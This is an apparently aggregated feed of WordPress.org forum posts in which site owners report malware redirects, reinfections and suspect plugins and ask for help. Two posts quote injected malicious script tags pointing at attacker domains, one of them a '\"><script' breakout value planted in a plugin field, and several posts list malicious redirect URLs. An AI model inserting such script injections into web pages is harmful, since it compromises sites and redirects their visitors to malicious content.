Quantcast
Channel: Topic Tag: malware | WordPress.org
Viewing all 3850 articles
Browse latest View live

Spammy site redirect

September 11, 2019, 12:59 am
$
0
0

My site is being redirected to:
‘https://1.tellmebluehistory.icu/?p=gqydoobwg45gi3bpgqytk&sub1=Xil&sub2=refers.v1’

This code can be found in the header of literally all posts and pages of the site:
<script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script>

This is an old site that we keep around because it has more traffic than the new one that we are working on, and we want to keep it around until the new site is more visible. We don’t update it’s plugins anymore except with the same posts
we make on our new site. Some premium plugins are very outdated and I know this is a security issue, but we don’t want to spend the money on them.

The main problem is that the wp-admin page is also redirected and I have no idea where to look for malicious code to get this fixed, as if I could log in, I could install some security plugins.

What I did so far is follow various tutorials on site hacks, trying to clean the files.
I removed malicious code from functions.php and malicious php files like wp-tmp.php etc.

I searched file contents for base​64_de​code

I checked the .htaccess file and it seems clean.( No contents at all).

I ended up putting completely fresh WordPress files with the old database, and the redirect still remained.

Then I saw that the script above was in all post content basically, so I deleted the script from the database after doing a backup. The redirect still remains. I also checked if any new users have registered recently, but that is not the case.

UPDATE: I have also cloned the empty site with the old database to a new domain and it is not redirecting there.

So I am out of ideas on this right now.

Any ideas/help with this issue would be greatly appreciated.

Search

wpadmin URL redirects randomly

September 14, 2019, 9:56 am
$
0
0

I manage a website hosted on a paid host. lately, I am redirected to what looks like maliscious websites on the first click on the wpadmin URL. If I ignore the new tab and click on the wpadmin URL, I can reach it. I called the host support and they said that your site is infected as shown by sucuri and you will need to pay $XXX to get it security enabled. I chekced with sucuri and it flags a visitor counter script I had installed as the malware, so a fake alert. I tired a few other plugins and none of them indicates any issue. How do I fix this?
One URL I am getting redirected to is
https://lp.searchdimension.com/12/?info=1&v=400#sdapp93
I have not copied the other one.

I wonder if it is my browser that is infected or the website.
Thanks

Potential Malware Detected in Clearfy

September 18, 2019, 3:07 pm
$
0
0

Hi, I’m using the Shield Security plugin and its Malware scanner (https://www.icontrolwp.com/blog/wordpress-core-file-scanner-automatic-repair/) detected some potential malware in the Clearfy code. Here’s what it says:

The following files contain suspected malware:
- wp-content/plugins/clearfy/admin/pages/components.php

What is causing this and should I be worried?

Thanks

Plugin not supported; open to malware – uninstall now!

September 19, 2019, 11:22 am
$
0
0

Hello,

Since this plugin is no longer on the repository or supported, it is highly suggested to remove this plugin. 3 of 4 of my sites using it were affected by the script malware described in https://blog.sucuri.net/2018/08/massive-wordpress-redirect-campaign-targets-vulnerable-tagdiv-themes-and-ultimate-member-plugins.html which redirects to malware, porn, or otherwise. Deactivating and removing the plugin fixed this.

Access denied – File permissions need to be reset

September 20, 2019, 3:04 pm
$
0
0

Hello all,

Hoping someone can share their experience and shed some light. My client site keeps getting the Access Denied message on the screen (4-5 times in the last few months) so I have to go in and change the file permissions back to what they should be rather than zero. I asked the host (ipower.com) why this keeps happening and they suggested some malware might be doing this. I called Sitelock who regularly scan our site for malware and they did not see any. They suggested that it might be at the host server level which they cannot reach to scan. We both got on the phone with the host, ipower.com, and the Sitelock guy asked them to find out if it was a bad chron job or if the site was “stuck” or if there was malware at their server level. ipower assured me they’d escalate the issue and I’d hear back. I’m not too confident I’ll hear anything concrete. Would they admit to malware in their server?

Has anyone else experienced this and if so, did they figure out what was causing it?

Thanks in advance!

Malware files appear in files

September 22, 2019, 10:13 pm
$
0
0

How do I make wordpress work well without being able to create a new files or edit a files in the entire wordpress directory? I want to avoid viruses because recently I get malware files, I deleted them, a few days later there are appear again, or a malware code lines is written to wp-settings.php, now wp-settings.php i changed chmod to wp-settings.php to nobody can write in file.
I used most populars malware clean plugins to clean wp even reinstalled whole wordpress but same result, i also have multiple wordpress on that hosting.

Hack related to Simple Fields?

September 24, 2019, 3:26 pm
$
0
0

I noticed today our website had problems, and yesterday it was fine. I was about to add a new post for a custom post type, the same as I had done yesterday, but I noticed none of the special fields that come from Simple Fields were where they were supposed to be on the edit page. It looked like a plain edit page.

Then I noticed all the pages on our website that used Simple Fields didn’t work – just showed header and footer but contents were empty.

I started digging and I went to the Simple Fields area in Settings and immediately noticed all of our Field Groups and Post Connectors were gone. There was just one Field Group called “test” and one “Post Connector” that had the following under name –

“><script type=text/javascript src=’https://bes.belaterbewasthere.com/corn/flex.js?tp=1$v88′></script>

That must have been put in there maliciously by a bot or hacker or something. I have no idea what that URL is, and having a JS file URL in there looks bad.

As far as I could tell, the WordPress admin showed everything else looking normal. Any Edit screens for a post type that had Simple Fields was lacking those Simple Fields. And a large portion of our pages didn’t work properly because the Simple Fields were not working.

We did have a backup that we reloaded successfully, and we’ll have more things to add back in since the last backup, but that is doable. However, we don’t know how this could have occurred and we don’t currently have a way to prevent it from happening again.

I just noticed on the plugin page –
https://wordpress.org/plugins/simple-fields/
It says in red background –
“This plugin has been closed as of September 16, 2019 and is not available for download. This closure is temporary, pending a full review.”

That is recent and it is interesting that it is a temporary closure and there will be a review. Perhaps someone is aware of a serious problem. Does anyone know more about this?

I also found in a simple-fields.com blog post that the plugin is not under development any longer. And it was even for sale. But WordPress.org shows the plugin was last updated 4 years ago so I don’t think anything nefarious could have gotten into the plugin code recently.
http://simple-fields.com/blog/

I don’t even know for sure if the Simple Fields plugin was the original vulnerability, but that is my best guess. We will check web server and network logs.

I guess if there is no short-term solution, then the long-term solution for us would be to use an alternative plugin to Simple Fields. That would be a huge undertaking.

Any input would be appreciated!

Hacked website

September 25, 2019, 9:19 am
$
0
0

Hi,

During the past weeks, I have been trying to get rid of some malware I suppose.

Last month, I noticed my website was redirected to malicious websites after clicking anywhere on the page.

I ran scans with all kinds of security plugins (Wordfence, Cerber, Malcure, just to name a few…)

Except Malcure which detected malicious code in the database, none of the scans allowed to reveal malicious files on the server.

Yet, I reuploaded a clean version of wordpress except from the content folder, and I deleted weird files I could see through the FTP in the uploads folders.

With PHPmyadmin, I looked for the malicious URL my website was redirected to (dolohen.com) to see which tables were infected. Then I manually cleaned the infected tables, which were wp_posts and wp_options.

I changed my admin password, and all the editors, and authors passwords on the website. I changed the database user, and password etc.

I had tried securing the website with .htaccess (disallowing editing via wordpress, disallowing certain uploads…)

But it kept coming back…

Then I noticed another issue which was a pop-up window asking people to click to continue browsing the website (p79479.com).

So, I did the same thing all over again.

Now, my admin password has changed twice already today. I had to reset it. So, I added 2 factor authentication… I searched for the aforementioned bits of malicious codes in my database, and didn’t find anything.

Yet, I’m not sure my site is completely clean, and my host doesn’t provide those kinds of services. Thus, here I am, asking for help.

Has anyone ever dealt with dolohen.com / p79479.com hacks?

Thanks in advance for your feedback.

Search

File Change Warning, is this normal?

September 26, 2019, 12:14 pm
$
0
0

I have consistently gotten file change warnings (and warnings of brute force attacks) since I started my hobby blog over a year ago. I’ve tried different things to shore up the security but they still happen, but I also don’t know if some of the more recent file change notifications are bad or not, because I have been making a lot of changes. The most recent I got was this:

url: WP-Cron Scheduled Task
Changed:
wp-content/uploads/sucuri/sucuri-plugindata.php
wp-content/uploads/sucuri/sucuri-auditlogs.php
wp-content/uploads/sucuri/sucuri-failedlogins.php
wp-content/uploads/sucuri/sucuri-oldfailedlogins.php
wp-content/uploads/sucuri/sucuri-settings.php
wp-content/uploads/sucuri/sucuri-auditqueue.php
wp-content/uploads/sucuri/sucuri-sitecheck.php
Removed:
Added:
wp-content/uploads/siteground-optimizer-assets/twentyseventeen-customize-preview.min.js

Does this look like a problem/hack/malware?
Any input is appreciated!

Website Hacked ! Don’t use it !

September 27, 2019, 6:08 am
$
0
0

As other users, my website was hacked with malicious code and after that nothing was working well because I had a lot of redirects to severals websites.. I lost a week trying to solve myself all the problems.. I hope wordpress pay atention to this kind of dishonest behaviour risking people’s work !..

Malware Database Infection.

October 1, 2019, 6:09 am
$
0
0

Hello,

First of all, thank you for this extraordinary theme! Maybe the best theme outside there! 🙂

I wanted not just to say thank you, but to tell you something that has happened with your theme:

My website was hacked weeks ago.. It was terrible and my site was very infected.. after a deep cleaning.. I found on my database severals websites links and I was wondering if all those links were a virus or malware from the attack.. I’ve checked some of those websites and yes.. effectively some of them were containing virus and malware. My surprise start when I noticed that those links were inserted into text written by Oceanwp / Blog.

I’ve searched portions of those texts on google and I found that were written for people participating on your blog / site. My questions are:

– Why does my Website has all those full blogs / texts inserted on my DataBase with links, some of them containing virus / malware ?? How can be possible ??
– How can I clean all those texts and where specifically they are hidden ??
– Does my website receiving those texts peridiocally ?? (I think that yes! Because some of those texts are from july and august..)
– Did you check all the people that write on your Website / Blog ??
– Is OceanWP theme really safe to use ??
– Are you using my website to redirecting people to your website ??

I would really like a good explanation because maybe I’m missing something or I’m wrong! But I’m very sure that I don’t want those “news” updated on my database with dangerous links.

Below I’ll share some texts (that you can search by yourself on google) and you’ll find your own Oceanwp blog:

When it comes to WordPress, then it is considered as one of the best content management system. It is easy to use that is the main reason why its demand is increasing day by day.

Keywords are phrases or separate words that show Google that your article is relevant to its topic. If your article’s theme is on 15 SEO tips and techniques to boost ranking on WordPress

is what sets big brands from mediocre ones. It allows you to create a recognizable brand personality across multiple channels and, above all, to build stronger relationships with your target audiences

And here I’ll share some useless links that I found on my database that came from those entire inserted blogs on my database (only open if you have an antivirus!):

[redacted – please do not post links to malware]

Thank you for your answers and support on this Topic !

Why does WordPress allow outdated plugins in their directory?

October 3, 2019, 5:54 am
$
0
0

Why does WordPress allow garbage like this to still be listed in their directory? The plugin does not work and now it still redirects to my subdomain and doesn’t work even after uninstalling it.

Now, I have to comb through my database to remove the redirect to find out what it did to my file manager.

Given all the malware that’s been infesting your plugin directory – it would seem to me you folks should be on top of this crap.

Redirects towards ad. website

October 9, 2019, 12:43 am
$
0
0

Please check this link it will take you to an advertisement website first and on 2nd load it will take to the exact site this is an ad. malware on website due to this malware facebook is not accepting my website’s link bosspakistan.com Please anyone guide me what is this problem and how wordfence can fix this issue.
I can;t run any campaign on social media channels as url of my site is not acceptable by them due to this malware.

Connection with online server

October 10, 2019, 2:52 am
$
0
0

Sorry, for such dummy question. I’m not have too strong network security knowledge. Could you please explain one thing about your plugin workflow. Is it require some external connection to some online server or you malware scanner work offline ?
For example if I install it on the internal blog of our company office is it gonna work without direct internet connection ?

Changing registration email address

October 10, 2019, 2:48 pm
$
0
0

Hello, there seems to be a problem with getting the lost password link that WordPress sent to my email server. Each time WordPress supposedly sent a link to my email address to reset the lost password, I never received one. This has been going on a couple of times. It seems as though my email server and WordPress do not connect (no message in the junk folder either). I didn’t pay much attention since I did not need to change my password. However, within the last 12 months my website was hacked by malware twice (the last one 3 days ago). It is becoming important to change my WordPress log In password. Since my current email address never gets the WordPress link it is probably better that I change my registration email address to another one (more reliable one0. That way I can get the link that WordPress send.So how can I change my registration email address on WordPress.org

Search

Strange url that I didn’t post coming from Bing- malware?

October 10, 2019, 11:29 pm
$
0
0

Hi, I’ve had WP for over 10 years, have several blogs with little traffic. Yet here I still am!

I just removed some nofollows I had on my blogs to stop search engines from scraping my own cartoons. However, seems like Google demands images or I won’t show up in search at all.

I noticed Palo Alto using the address url above: https://chocolatecartoons.com/boumboumboum and it’s giving a 404.

This is not a post of mine, nor an image. What is it, can you tell? I can see in search it’s the name of some song, but is this just some malicious attack, to give me 404s? Any ideas?

Malware Detected?

October 11, 2019, 3:17 am
$
0
0

I did a security scan (Linux Malware Detect + ClamAV) of my wordpress files. The scan quarantined 1 file.

TOTAL FILES: 30741
TOTAL HITS: 1
TOTAL CLEANED: 0

[ deleted, don’t post that here ]

I’d love some input here… can anyone help me decode what’s happening in that line of code?

MALWARE FOUND

October 13, 2019, 11:41 am
$
0
0

Tous les sites où j’ai installé cette extension contenaient un malware.
Depuis que j’ai changé pour SlimStat plus de soucis !
Le malware n’affiche pas les popup de sites porno sur votre propre ordi / IP !
Merci de vérifier !

“Too few arguments” in error.log

October 14, 2019, 3:01 pm
$
0
0

Hi,
I got the following warning in my error.log of iThemes Security:
“PHP Warning: printf(): Too few arguments in /home/dierenduintje/public_html/wp-content/plugins/better-wp-security/core/modules/malware/settings-page.php on line 52”
My sit is on dierenduintje.nl
Could you please tell me what I can do about it?
Thanks!
Kees Koopman

Symantec 30548 web attack jscoinminer website detected

October 18, 2019, 12:50 pm
$
0
0

Hi,

Recently I had a malware on my website that redirects to another site in a new tab.That behavior doesn’t do it anymore.But I am seeing this message every time there is a webiste page.

Any ideas?

Viewing all 3850 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>